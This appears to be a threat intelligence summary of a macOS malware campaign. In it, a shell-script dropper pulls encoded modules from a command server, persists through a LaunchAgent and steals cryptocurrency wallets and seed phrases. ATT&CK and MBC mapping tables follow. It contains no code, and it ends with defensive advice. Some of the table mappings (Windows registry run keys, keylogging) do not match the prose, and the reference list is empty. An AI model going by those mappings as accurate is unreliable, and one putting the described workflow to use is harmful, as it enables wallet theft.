EXECUTIVE SUMMARY:
This stealthy and modular macOS-focused malware campaign built around a multi-stage shell script that functions as an initial dropper. The script retrieves additional encoded components from a remote command server, decodes them, and executes them on the victim system. The operation establishes persistence through a LaunchAgent entry, ensuring the malicious process restarts automatically whenever the system is logged in. The campaign is designed to quietly infiltrate environments where cryptocurrency usage is common, emphasizing the theft of wallet data, seed phrases, and system information. Rather than relying on simple social engineering, the threat involves structured post-execution activity, long-term persistence, and targeted data collection. Its design points toward a financially motivated group seeking durable access and repeated exfiltration opportunities.
Once executed, the initial script sets up a concealed working directory within the user’s home folder and begins a continuous retrieval cycle, pulling base64-encoded modules from its command server. Each module is decoded and run in sequence, giving the threat actor flexibility to update capabilities remotely. The persistence mechanism depends on a LaunchAgent plist that automatically reinitializes the orchestrator at every login. The downloaded modules are tailored for crypto-related theft: they extract wallet files, monitor directories associated with multiple wallet platforms, and replace legitimate wallet applications with tampered clones designed to capture seed phrases. Additional modules gather device telemetry, installed software data, and process lists, enhancing situational awareness for the operator. The communication patterns indicate obfuscation measures meant to evade both behavioral detection and static analysis.
Overall, the campaign represents a highly targeted and financially driven malware operation designed to persist within macOS environments. The modular architecture gives the attackers the ability to push new functionality, maintain long-term access, and adapt to defender countermeasures. The focus on cryptocurrency wallet harvesting, combined with application replacement techniques and continuous system monitoring, signals an effort to maximize financial gain with minimal visibility. Its persistence strategy, multi-stage delivery model, and tailored exfiltration workflows highlight a threat actor with technical discipline and a clear operational objective. Defenders should prioritize detection of unusual LaunchAgent entries, integrity monitoring of wallet applications, and restrictions on arbitrary script execution to mitigate the risk posed by this type of campaign.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-Technique |
| Execution | T1059.006 | Command & Scripting Interpreter | Python |
| Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys . Startup Folder |
| Privilege Escalation | T1068 | Exploitation for Privilege Escalation | — |
| Defense Evasion | T1140 | Deobfuscate.Decode Files or Information | — |
| T1027 | Obfuscated Files or Information | — | |
| Discovery | T1082 | System Information Discovery | — |
| T1057 | Process Discovery | — | |
| T1518.001 | Software Discovery | Security Software Discovery | |
| Collection | T1005 | Data from Local System | — |
| T1119 | Automated Collection | — | |
| Credential Access | T1555.003 | Credentials from Password Stores | Credentials from Web Browsers |
| Command & Control | T1105 | Ingress Tool Transfer | — |
| T1071.001 | Application Layer Protocol | Web Protocols | |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | — |
| T1567.002 | Exfiltration Over Web Services | Exfiltration to Cloud Storage |
MBC MAPPING:
| Objective | Behaviour ID | Behaviour |
| Execution | E1204 | User Execution |
| Persistence | F0012 | Registry Run Keys / Startup Folder |
| Collection | F0002 | Keylogging |
| E1113 | Screen Capture |
REFERENCES:
The following reports contain further technical details: